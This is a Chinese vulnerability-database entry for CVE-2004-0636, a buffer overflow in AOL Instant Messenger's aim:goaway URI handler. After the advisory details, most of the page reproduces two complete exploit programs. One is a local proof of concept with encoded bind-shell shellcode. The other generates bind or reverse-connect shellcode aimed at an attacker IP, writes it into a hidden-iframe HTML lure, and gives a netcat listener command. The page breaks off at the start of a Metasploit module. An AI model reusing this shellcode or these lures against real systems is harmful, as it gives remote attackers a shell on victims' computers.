CVE-2004-0636
CVSS10.0
发布时间 :2004-11-23 00:00:00
修订时间 :2008-09-10 15:27:04
NMCOEPS    

[原文]Buffer overflow in the goaway function in the aim:goaway URI handler for AOL Instant Messenger (AIM) 5.5, including 5.5.3595, allows remote attackers to execute arbitrary code via a long Away message.


[CNNVD]AOL Instant Messenger Away Message缓冲区溢出漏洞(CNNVD-200411-135)

        
        AOL Instant Messenger是一款在线即时聊天工具。
        AOL在处理 'aim://' URL时缺少正确的边界缓冲区检查,远程攻击者可以利用这个漏洞构建恶意链接,诱使用户访问,以进程权限在系统上执行任意指令。
        攻击者构建包含超过1024字节的'aim://goaway?message' URL,诱使AIM用户处理,可导致触发缓冲区溢出,精心构建URI数据,可能以当前用户权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:aol:instant_messenger:5.5
cpe:/a:aol:instant_messenger:5.5.3415_beta
cpe:/a:aol:instant_messenger:5.5.3595

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0636
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0636
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-135
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/735966
(UNKNOWN)  CERT-VN  VU#735966
http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities
(VENDOR_ADVISORY)  MISC  http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities
http://secunia.com/advisories/12198/
(VENDOR_ADVISORY)  SECUNIA  12198
http://xforce.iss.net/xforce/xfdb/16926
(UNKNOWN)  XF  aim-away-bo(16926)

- 漏洞信息

AOL Instant Messenger Away Message缓冲区溢出漏洞
危急 边界条件错误
2004-11-23 00:00:00 2005-10-20 00:00:00
远程  
        
        AOL Instant Messenger是一款在线即时聊天工具。
        AOL在处理 'aim://' URL时缺少正确的边界缓冲区检查,远程攻击者可以利用这个漏洞构建恶意链接,诱使用户访问,以进程权限在系统上执行任意指令。
        攻击者构建包含超过1024字节的'aim://goaway?message' URL,诱使AIM用户处理,可导致触发缓冲区溢出,精心构建URI数据,可能以当前用户权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        AOL
        ---
        目前厂商已经在5.9及以上版本的软件中修补了这个安全问题,请到厂商的主页下载最新AIM程序:
        
        http://www.aim.com/

- 漏洞信息 (395)

AOL Instant Messenger AIM "Away" Message Local Exploit (EDBID:395)
windows local
2004-08-14 Verified
0 mandragore
N/A [点击下载]
/*

subject:    local PoC exploit for AIM 5.5.3595

vendor:     http://www.aim.com
cve:          http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0636
credits:      Matt Murphy
date:        10 August 2004

notes:      exploits localy if an argument is supplied, otherwise prints the url.
            offsets are based on exe/dll provided in the package, so it should be NT universal. 
            shellcode makes a bindshell on port 1180.

greets:     roSec - Romanian Security Research - www rosec info

author:     mandragore

*/


#include <stdio.h>
#include <windows.h>
#include <winsock.h>
#pragma comment(lib,"ws2_32.lib")

#define GPA 0x004040a4
#define LLA 0x00404088

#define fatal(x) { perror(x); exit(1); }

unsigned char bsh[]={
0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB0,0x80,0x36,0xDE,0x46,0xE2,0xFA,
0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0x57,0xD7,0x60,0xDE,0xFE,0x9E,0xDE,0xB6,0xED,
0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,0x9E,0xDE,0x49,
0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0xB4,0x90,0x89,0x21,0xC8,0x21,0x0E,
0x4D,0xB4,0xDE,0xB6,0xDC,0xDE,0xDA,0x42,0x55,0x1A,0xB4,0xCE,0x8E,0x8D,0xB4,0xDC,
0x89,0x21,0xC8,0x21,0x0E,0xB4,0xDF,0x8D,0xB4,0xD3,0x89,0x21,0xC8,0x21,0x0E,0xB4,
0xDE,0x8A,0x8D,0xB4,0xDF,0x89,0x21,0xC8,0x21,0x0E,0x55,0x06,0xED,0x1E,0xB4,0xCE,
0x87,0x55,0x22,0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,
0xDF,0x8E,0x8E,0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,0xBA,0xDE,0x8E,0x36,0xD1,0xDE,
0xDE,0xDE,0x9D,0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,
0xDE,0x18,0xD9,0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,0xDE,0x5D,0x19,0xE6,0x4D,0x75,
0x75,0x75,0xBA,0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,0x55,0x9E,0xC2,0x55,0xDE,0x21,
0xAE,0xD6,0x21,0xC8,0x21,0x0E
};

char *uri="aim:goaway?message=";

unsigned char smalljmp[]={ 0xeb, 0x08 };

void client2serv(unsigned int s) {
	char buff[4096];

	for (;;) {
		fgets(buff,4096,stdin);
		send(s,buff,strlen(buff),0);
	}
}

void sh() {
	int ret;
	long s;
	WSADATA wsa;
	struct sockaddr_in sin;
	char buff[4096];
	fd_set fds;
	long host=0x0100007f;

	WSAStartup(0x202,&wsa);

	sin.sin_family=2;
	sin.sin_port=htons(1180);
	sin.sin_addr = *(struct in_addr *)&host;

	s=socket(2,1,6);
	if ( ret=connect(s,(struct sockaddr *)&sin,16) != 0) {
		fatal("[-] damn.. it looks like it failed\n");
	} else
		printf("[+] connected.\n\n");

	CreateThread(0,0,(void *)client2serv,(long *)s,0,0);

	for (;;) {
		FD_ZERO(&fds);
		FD_SET(s,&fds);

        if (select(s+1, &fds, NULL, NULL, NULL) < 0)
			fatal("[-] shell.select()");

		if (FD_ISSET(s,&fds)) {
			if ( (ret = recv(s,buff,4096,0)) < 1 )
				fatal("[-] shell.recv()");
			memset(buff+ret,0,1);
			printf("%s",buff);
		}
	}

}

void fixsh() {
	int gpa=GPA^0xdededede, lla=LLA^0xdededede;
	memcpy(bsh+0x1a,&gpa,4);
	memcpy(bsh+0x2b,&lla,4);
}

int main(int argc, char **argv) {
	char *t;
	int retaddr=0x10015599; // call ebx from rtvideo.dll, should be stable

	fixsh();

	t=GlobalAlloc(0x40,2000);
	memset(t,0x41,1500);
	strncpy(t,uri,strlen(uri));
	memcpy(t+1037-4,&smalljmp,2);
	memcpy(t+1037,&retaddr,4);
	memcpy(t+1037+4+4,&bsh,sizeof(bsh));

	if (argc==1) {
		printf("%s\n",t);
		return 0;
	}

	printf("[+] sending request..\n");

	ShellExecute(0,"open",t,0,0,SW_SHOW);

	printf("[%%] let's sleep 5secs..\n");
	
	Sleep(5000);

	sh();

	return 0;
}

// milw0rm.com [2004-08-14]
		

- 漏洞信息 (431)

AOL Instant Messenger AIM "Away" Message Remote Exploit (EDBID:431)
windows remote
2004-09-02 Verified
0 John Bissell
N/A [点击下载]
/* CAN-2004-0636 */

/*
 * AIM Away Message Buffer Overflow Exploit
 *   Exploit by John Bissell A.K.A. HighT1mes
 *
 * Exploit: 
 * ========
 *   drizzit.c
 *
 * Vulnerable Software:
 * ====================
 *    - AIM 5.5.3588
 *    - AIM 5.5.3590 Beta
 *    - AIM 5.5.3591
 *    - AIM 5.5.3595
 *    and a couple others versions...
 *
 * If you want to try other return addressees for other versions of
 * AIM then edit the return address.. But the current one embedded 
 * will work for sure with all the AIM versions listed above.
 *
 * I used some of the metasploit shellcode for this exploit with some
 * modifications to get this into stealth mode so it is harder to 
 * detect the attack. Since I'm using metasploit shellcode that means this
 * exploit can be used on any NT type OS, like win2k, winnt, winxp across
 * any service pack.. I don't know about SP2 though I haven't tested
 * it yet.
 *
 * On a side note I pourposly did not include the download+exec shellcode
 * even though I have it because I'm sick and tired of these little
 * spam/adware bitchs messing peoples computers up for profit.. You can
 * still download/upload through the shell to the victim. It just 
 * isn't automated like download+exec would be.
 *
 * In my opinion the reverse connect (-r option) is the most dangerous
 * because you can encode your ip address and pick a port, and then 
 * when the victim visits the evil web page or email whatever.. then the
 * attack will automatically open his AIM even its not already open and
 * connect to you and then terminate the AIM process to be stealth so
 * the victim doesn't know what him them.. As I remind people in the
 * exploit usage you need to remember to use netcat to listen on a 
 * port you picked for the exploit to connect to...
 *
 * One reason I decided to include the generation of html code for 
 * this exploit is I noticed almost no puts small limits on the 
 * <IFRAME SRC=""> attribute. So when the victim connects to that
 * page or reads that email depending on the browser or client, 
 * The exploit will execute.. IE 6.0 and Mozilla are 
 * affected by this problem as well as Outlook Express when the
 * security settings are set to the Internet Zone.
 *
 * Excuse the sloppy commandline interface I just wanted to get
 * this out to the public. 
 *
 * [ Original advisory posted by Secunia and iDEFENSE. ]
 *
 * Greets:
 * =======
 *   IsolationX, YpCat, DaPhire, route, #romhack,
 *   Taylor Hayes, Aria Giovanni, Anthony Rocha,
 *   InVerse, Deltaflame, Jenna Jameson, iDENFENSE, 
 *   secunia, so1o, John Kerry, and many others...
 *
 * Compiler: 
 * =========
 *    Visual C++ 6.0
 *
 * To compile you first must add ws2_32.lib to the Object/librarys modules:
 * text box under the Project -> Settings menu; then click on the link tab...
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

/* Exploit Data */

char injection_vector[] =

                        "\x61\x69\x6D\x3A\x67\x6F\x61\x77\x61\x79\x3F\x6D\x65\x73\x73\x61"
                        "\x67\x65\x3D\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41";

char bind_shellcode[] = 

                        "\xEB\x26\x23\x38\x3B\x41\x41"
                        "\x92\x0f\x29\x12\x41\x41\x41\x41\xD9\xE1\xD9\x34\x24\x58\x58\x58"
                        "\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\x97\xFE\x80\x30\x92\x40\xE2"
                        "\xFA\x7A\xAA\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB\x54\xEB\x77\xDB"
                        "\x14\xDB\x36\x3F\xBC\x7B\x36\x88\xE2\x55\x4B\x9B\x67\x3F\x59\x7F"
                        "\x6E\xA9\x1C\xDC\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C"
                        "\x21\x84\xC5\xC1\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6"
                        "\x1B\x77\x1B\xCF\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2"
                        "\x8E\x3F\x19\xCA\x9A\x79\x9E\x1F\xC5\xBE\xC3\xC0\x6D\x42\x1B\x51"
                        "\xCB\x79\x82\xF8\x9A\xCC\x93\x7C\xF8\x98\xCB\x19\xEF\x92\x12\x6B"
                        "\x94\xE6\x76\xC3\xC1\x6D\xA6\x1D\x7A\x07\x92\x92\x92\xCB\x1B\x96"
                        "\x1C\x70\x79\xA3\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92"
                        "\x6D\xC7\xB2\xC5\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x8E\x1B\x51"
                        "\xA3\x6D\xC5\xC5\xFA\x90\x92\xB0\x83\x1B\x74\xF8\x82\xC4\xC1\x6D"
                        "\xC7\x8A\xC5\xC1\x6D\xC7\x86\xC5\xC4\xC1\x6D\xC7\x82\x1B\x50\xF4"
                        "\x13\x7E\xC6\x92\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x1B\x45"
                        "\x54\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xEE\xB6\xDA"
                        "\x1B\xEE\xB6\xDE\x1B\xEE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3"
                        "\xC3\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xA2\x1B\x73\x79"
                        "\x9C\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xBE\xC5\x6D\xC7\x9E\x6D"
                        "\xC7\xBA\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97"
                        "\xEA\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6"
                        "\x19\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F"
                        "\x93\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4"
                        "\x19\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3"
                        "\x52\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";

char reverse_shellcode[] =
                         
                        "\xEB\x08\x41\x41\x92\x0f\x29\x12\x41\x41\x41\x41\xD9\xE1\xD9\x34"
                        "\x24\x58\x58\x58\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\xAC\xFE\x80"
                        "\x30\x92\x40\xE2\xFA\x7A\xA2\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB"
                        "\x54\xEB\x7E\x6B\x38\xF2\x4B\x9B\x67\x3F\x59\x7F\x6E\xA9\x1C\xDC"
                        "\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C\x21\x84\xC5\xC1"
                        "\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6\x1B\x77\x1B\xCF"
                        "\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2\x8E\x3F\x19\xCA"
                        "\x9A\x79\x9E\x1F\xC5\xB6\xC3\xC0\x6D\x42\x1B\x51\xCB\x79\x82\xF8"
                        "\x9A\xCC\x93\x7C\xF8\x9A\xCB\x19\xEF\x92\x12\x6B\x96\xE6\x76\xC3"
                        "\xC1\x6D\xA6\x1D\x7A\x1A\x92\x92\x92\xCB\x1B\x96\x1C\x70\x79\xA3"
                        "\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92\x6D\xC7\x8A\xC5"
                        "\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x86\x1B\x51\xA3\x6D\xFA\xDF"
                        "\xDF\xDF\xDF\xFA\x90\x92\xB0\x83\x1B\x73\xF8\x82\xC3\xC1\x6D\xC7"
                        "\x82\x17\x52\xE7\xDB\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x54"
                        "\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xCE\xB6\xDA\x1B"
                        "\xCE\xB6\xDE\x1B\xCE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3\xC3"
                        "\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xBA\x1B\x73\x79\x9C"
                        "\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xB6\xC5\x6D\xC7\x9E\x6D\xC7"
                        "\xB2\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97\xEA"
                        "\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6\x19"
                        "\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F\x93"
                        "\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4\x19"
                        "\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3\x52"
                        "\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";

/* Function Prototypes */

void print_usage(char *prog_name);
unsigned char xor_data(unsigned char byte);

/* Function Code */

int main(int argc, char *argv[])
{
	int i                           = 0;
	int raw_num                     = 0;
	unsigned long port              = 1337; /* default port for bind and reverse attacks
*/
	unsigned long encoded_port      = 0;
	unsigned long encoded_ip        = 0;
	unsigned char print_raw_exploit = 0;
	unsigned char attack_mode       = 2;    /* bind attack by default */
	char ip_addr[256];
	char exploit[2048];
	char str_num[16];
	char *p1, *p2;
	FILE *EXPLOIT_FP;
	char outfile[512];
	WSADATA wsa;




	if (argc < 2) print_usage(argv[0]);

	/* process commandline */
	for (i = 0; i < argc; i++) {
		if (argv[i][0] == '-') {
			switch (argv[i][1]) {
			case 'r':
				/* reverse connect */
				strncpy(ip_addr, argv[i+1], 20);
				attack_mode = 1;
				break;
			case 'b':
				/* bind */
				attack_mode = 2;
				break;
			case 'p':
				port = atoi(argv[i+1]);
				/* port */
				break;
			case 'o':
				print_raw_exploit = 1;
				break;
			case 'e':
				strncpy(outfile, argv[i+1], 256);
			}
		}
	}

  /* initialize the socket library */
  if (WSAStartup(MAKEWORD(1, 1), &wsa) == SOCKET_ERROR) {
    printf("Error: Winsock didn't initialize!\n");
    exit(-1);
  }

	/* build exploit */
	strncpy(exploit, injection_vector, strlen(injection_vector));
	exploit[strlen(injection_vector)+1]=0; // tack on NULL byte
	encoded_port = htonl(port);
	encoded_port += 2;
	if (attack_mode == 1) {
		/* reverse connect attack */
		reverse_shellcode[196] = (char) 0x90;
     	reverse_shellcode[197] = (char) 0x92;
		reverse_shellcode[198] = xor_data((char)((encoded_port >> 16) & 0xff));
		reverse_shellcode[199] = xor_data((char)((encoded_port >> 24) & 0xff));

		p1 = strchr(ip_addr, '.');
		strncpy(str_num, ip_addr, p1-ip_addr);
		raw_num = atoi(str_num);
		reverse_shellcode[191] = xor_data((char)raw_num);

		p2 = strchr(p1+1, '.');
		strncpy(str_num, ip_addr+(p1-ip_addr)+1, p2-p1);
		raw_num = atoi(str_num);
		reverse_shellcode[192] = xor_data((char)raw_num);

		p1 = strchr(p2+1, '.');
		strncpy(str_num, ip_addr+(p2-ip_addr)+1, p1-p2);
		raw_num = atoi(str_num);
		reverse_shellcode[193] = xor_data((char)raw_num);

		p2 = strrchr(ip_addr, '.');
		strncpy(str_num, p2+1, 5);
		raw_num = atoi(str_num);
		reverse_shellcode[194] = xor_data((char)raw_num);

		strncat(exploit, reverse_shellcode, sizeof(reverse_shellcode));
	}
	if (attack_mode == 2) {
		/* bind attack */
		bind_shellcode[204] = (char) 0x90;
     	bind_shellcode[205] = (char) 0x92;
		bind_shellcode[206] = xor_data((char)((encoded_port >> 16) & 0xff));
		bind_shellcode[207] = xor_data((char)((encoded_port >> 24) & 0xff));
		strncat(exploit, bind_shellcode, sizeof(bind_shellcode));
	}

	WSACleanup();

	/* output exploit */
	if (print_raw_exploit == 1) {
		printf("%s", exploit);
	}
	else {
		if ((EXPLOIT_FP = fopen(outfile, "w")) == NULL) {
			fprintf(stderr, "Error: Exploit file can't be created!\n");
			exit(-1);
		}

		fprintf(EXPLOIT_FP, "<html>\n");
		fprintf(EXPLOIT_FP, "<head>\n");
		fprintf(EXPLOIT_FP, "<title>Hey d00d!</title>\n");
		fprintf(EXPLOIT_FP, "</head>\n");
		fprintf(EXPLOIT_FP, "<body>\n");
		fprintf(EXPLOIT_FP, "Some fake web page or email...\n");
		fprintf(EXPLOIT_FP, "<iframe width=0 height=0 border=0 src=\"");
		fprintf(EXPLOIT_FP, "%s", exploit);
		fprintf(EXPLOIT_FP, "\">\n</iframe>\n");
		fprintf(EXPLOIT_FP, "</body>\n");
		fprintf(EXPLOIT_FP, "<html>\n");

		fclose(EXPLOIT_FP);

		/* im to lazy to make a macro for this banner :P */
		printf(" +-------------------------------------------------+\n");
		printf(" |  AIM Exploit by John Bissell A.K.A. HighT1mes   |\n");
		printf(" |    AIM Away Message Buffer Overflow Exploit     |\n");
		printf(" +-------------------------------------------------+\n\n");

		printf(" Exploit created!\n\n");

		printf(" Remember if you use the -r option to have netcat listening\n");
		printf(" on the port you are using for the attack so the victim will\n");
		printf(" be able to connect to you when exploited...\n\n");
		printf(" Example:\n");
		printf("\tnc.exe -l -p %d", port);
	}

	return(EXIT_SUCCESS);
}

void print_usage(char *prog_name)
{
	printf(" +-------------------------------------------------+\n");
	printf(" |  AIM Exploit by John Bissell A.K.A. HighT1mes   |\n");
	printf(" |    AIM Away Message Buffer Overflow Exploit     |\n");
	printf(" +-------------------------------------------------+\n\n");
	printf(" Exploit Usage:\n");
	printf("\t%s -r your_ip | -b [-p port] -o | -e outfile\n\n", prog_name);
	printf(" Parameters:\n");
	printf("\t-r your_ip or -b\t Choose -r for reverse connect attack mode\n\t\t\t\t
and choose -b for a bind attack. By default\n\t\t\t\t if you don't specify -r or
-b then a bind\n\t\t\t\t attack will be generated.\n\n");
	printf("\t-p (optional)\t\t This option will allow you to change the port \n\t\t\t\t
used for a bind or reverse connect attack.\n\t\t\t\t If the attack mode is bind
then  the\n\t\t\t\t victim will open the -p port. If the attack\n\t\t\t\t mode
is reverse connect  then the port you\n\t\t\t\t specify will be the one you want
to listen\n\t\t\t\t on so the victim can  connect to you\n\t\t\t\t right away.\n\n");
	printf("\t-o or -e outfile\t\t Here you specify the output method...\n\t\t\t\t If
you would like output go straight to\n\t\t\t\t standerd output then specify the
-o option\n\t\t\t\t otherwise give the path of where you want to\n\t\t\t\t create
the exploit file which is basically\n\t\t\t\t a simple html file. The -o option
is useful if\n\t\t\t\t you want to test the exploit url in\n\t\t\t\t different
ways.\n\n");
	printf(" Examples:\n");
	printf("\t%s -r 68.6.47.62 -p 8888 -e c:\\exploit.html\n", prog_name);
	printf("\t%s -b -p 1542 -e c:\\new_exploit.html\n", prog_name);
	printf("\t%s -b -o\n", prog_name);
	printf("\t%s -r 68.6.47.62 -o\n\n", prog_name);
	printf(" Remember if you use the -r option to have netcat listening\n");
	printf(" on the port you are using for the attack so the victim will\n");
	printf(" be able to connect to you when exploited...\n\n");
	printf(" Example:\n");
	printf("\tnc.exe -l -p 8888");
	exit(-1);
}

unsigned char xor_data(unsigned char byte)
{
	return(byte ^ 0x92);
}

// milw0rm.com [2004-09-02]
		

- 漏洞信息 (16525)

AOL Instant Messenger goaway Overflow (EDBID:16525)
windows remote
2010-07-03 Verified
0 metasploit
N/A [点击下载]
##
# $Id: aim_goaway.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	#
